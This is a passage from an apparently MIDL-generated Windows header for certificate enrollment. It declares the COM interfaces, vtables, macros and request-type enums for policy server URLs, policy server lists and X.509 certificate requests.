    ( (This)->lpVtbl -> InitializeImport(This,val) ) 

#define IX509EnrollmentPolicyServer_Export(This,exportFlags,pVal)	\
    ( (This)->lpVtbl -> Export(This,exportFlags,pVal) ) 

#define IX509EnrollmentPolicyServer_get_Cost(This,pValue)	\
    ( (This)->lpVtbl -> get_Cost(This,pValue) ) 

#define IX509EnrollmentPolicyServer_put_Cost(This,value)	\
    ( (This)->lpVtbl -> put_Cost(This,value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__ */


#ifndef __IX509PolicyServerUrl_INTERFACE_DEFINED__
#define __IX509PolicyServerUrl_INTERFACE_DEFINED__

/* interface IX509PolicyServerUrl */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PolicyServerUrl;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("884e204a-217d-11da-b2a4-000e7bbb2b09")
    IX509PolicyServerUrl : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Url( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Url( 
            /* [in] */ __RPC__in BSTR pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Default( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Default( 
            /* [in] */ VARIANT_BOOL value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Flags( 
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Flags( 
            /* [in] */ PolicyServerUrlFlags Flags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthFlags( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AuthFlags( 
            /* [in] */ X509EnrollmentAuthFlags Flags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Cost( 
            /* [retval][out] */ __RPC__out DWORD *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Cost( 
            /* [in] */ DWORD value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetStringProperty( 
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetStringProperty( 
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [in] */ __RPC__in BSTR pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE UpdateRegistry( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveFromRegistry( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PolicyServerUrlVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PolicyServerUrl * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PolicyServerUrl * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PolicyServerUrl * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Url )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Url )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in BSTR pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Default )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Default )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ VARIANT_BOOL value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Flags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Flags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlFlags Flags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthFlags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AuthFlags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509EnrollmentAuthFlags Flags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Cost )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out DWORD *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Cost )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ DWORD value);
        
        HRESULT ( STDMETHODCALLTYPE *GetStringProperty )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetStringProperty )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [in] */ __RPC__in BSTR pValue);
        
        HRESULT ( STDMETHODCALLTYPE *UpdateRegistry )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromRegistry )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        END_INTERFACE
    } IX509PolicyServerUrlVtbl;

    interface IX509PolicyServerUrl
    {
        CONST_VTBL struct IX509PolicyServerUrlVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PolicyServerUrl_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PolicyServerUrl_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PolicyServerUrl_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PolicyServerUrl_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PolicyServerUrl_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PolicyServerUrl_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PolicyServerUrl_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PolicyServerUrl_Initialize(This,context)	\
    ( (This)->lpVtbl -> Initialize(This,context) ) 

#define IX509PolicyServerUrl_get_Url(This,ppValue)	\
    ( (This)->lpVtbl -> get_Url(This,ppValue) ) 

#define IX509PolicyServerUrl_put_Url(This,pValue)	\
    ( (This)->lpVtbl -> put_Url(This,pValue) ) 

#define IX509PolicyServerUrl_get_Default(This,pValue)	\
    ( (This)->lpVtbl -> get_Default(This,pValue) ) 

#define IX509PolicyServerUrl_put_Default(This,value)	\
    ( (This)->lpVtbl -> put_Default(This,value) ) 

#define IX509PolicyServerUrl_get_Flags(This,pValue)	\
    ( (This)->lpVtbl -> get_Flags(This,pValue) ) 

#define IX509PolicyServerUrl_put_Flags(This,Flags)	\
    ( (This)->lpVtbl -> put_Flags(This,Flags) ) 

#define IX509PolicyServerUrl_get_AuthFlags(This,pValue)	\
    ( (This)->lpVtbl -> get_AuthFlags(This,pValue) ) 

#define IX509PolicyServerUrl_put_AuthFlags(This,Flags)	\
    ( (This)->lpVtbl -> put_AuthFlags(This,Flags) ) 

#define IX509PolicyServerUrl_get_Cost(This,pValue)	\
    ( (This)->lpVtbl -> get_Cost(This,pValue) ) 

#define IX509PolicyServerUrl_put_Cost(This,value)	\
    ( (This)->lpVtbl -> put_Cost(This,value) ) 

#define IX509PolicyServerUrl_GetStringProperty(This,propertyId,ppValue)	\
    ( (This)->lpVtbl -> GetStringProperty(This,propertyId,ppValue) ) 

#define IX509PolicyServerUrl_SetStringProperty(This,propertyId,pValue)	\
    ( (This)->lpVtbl -> SetStringProperty(This,propertyId,pValue) ) 

#define IX509PolicyServerUrl_UpdateRegistry(This,context)	\
    ( (This)->lpVtbl -> UpdateRegistry(This,context) ) 

#define IX509PolicyServerUrl_RemoveFromRegistry(This,context)	\
    ( (This)->lpVtbl -> RemoveFromRegistry(This,context) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PolicyServerUrl_INTERFACE_DEFINED__ */


#ifndef __IX509PolicyServerListManager_INTERFACE_DEFINED__
#define __IX509PolicyServerListManager_INTERFACE_DEFINED__

/* interface IX509PolicyServerListManager */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PolicyServerListManager;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("884e204b-217d-11da-b2a4-000e7bbb2b09")
    IX509PolicyServerListManager : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509PolicyServerUrl **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509PolicyServerUrl *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ PolicyServerUrlFlags Flags) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PolicyServerListManagerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PolicyServerListManager * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509PolicyServerUrl **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in_opt IX509PolicyServerUrl *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ PolicyServerUrlFlags Flags);
        
        END_INTERFACE
    } IX509PolicyServerListManagerVtbl;

    interface IX509PolicyServerListManager
    {
        CONST_VTBL struct IX509PolicyServerListManagerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PolicyServerListManager_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PolicyServerListManager_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PolicyServerListManager_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PolicyServerListManager_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PolicyServerListManager_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PolicyServerListManager_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PolicyServerListManager_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PolicyServerListManager_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509PolicyServerListManager_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509PolicyServerListManager_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509PolicyServerListManager_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509PolicyServerListManager_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509PolicyServerListManager_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509PolicyServerListManager_Initialize(This,context,Flags)	\
    ( (This)->lpVtbl -> Initialize(This,context,Flags) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PolicyServerListManager_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0075 */
/* [local] */ 

typedef 
enum X509RequestType
    {
        TypeAny	= 0,
        TypePkcs10	= 1,
        TypePkcs7	= 2,
        TypeCmc	= 3,
        TypeCertificate	= 4
    } 	X509RequestType;

typedef 
enum X509RequestInheritOptions
    {
        InheritDefault	= 0,
        InheritNewDefaultKey	= 0x1,
        InheritNewSimilarKey	= 0x2,
        InheritPrivateKey	= 0x3,
        InheritPublicKey	= 0x4,
        InheritKeyMask	= 0xf,
        InheritNone	= 0x10,
        InheritRenewalCertificateFlag	= 0x20,
        InheritTemplateFlag	= 0x40,
        InheritSubjectFlag	= 0x80,
        InheritExtensionsFlag	= 0x100,
        InheritSubjectAltNameFlag	= 0x200,
        InheritValidityPeriodFlag	= 0x400,
        InheritReserved80000000	= 0x80000000
    } 	X509RequestInheritOptions;

typedef 
enum InnerRequestLevel
    {
        LevelInnermost	= 0,
        LevelNext	= 1
    } 	InnerRequestLevel;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0075_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0075_v0_0_s_ifspec;

#ifndef __IX509CertificateRequest_INTERFACE_DEFINED__
#define __IX509CertificateRequest_INTERFACE_DEFINED__

/* interface IX509CertificateRequest */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequest;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab341-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequest : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Encode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ResetForEncode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetInnerRequest( 
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out X509RequestType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentContext( 
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressDefaults( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SuppressDefaults( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RenewalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_RenewalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ClientId( 
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ClientId( 
            /* [in] */ RequestClientInfoClientId Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CspInformations( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CspInformations( 
            /* [in] */ __RPC__in_opt ICspInformations *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequest * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequest * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequest * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequest * This,
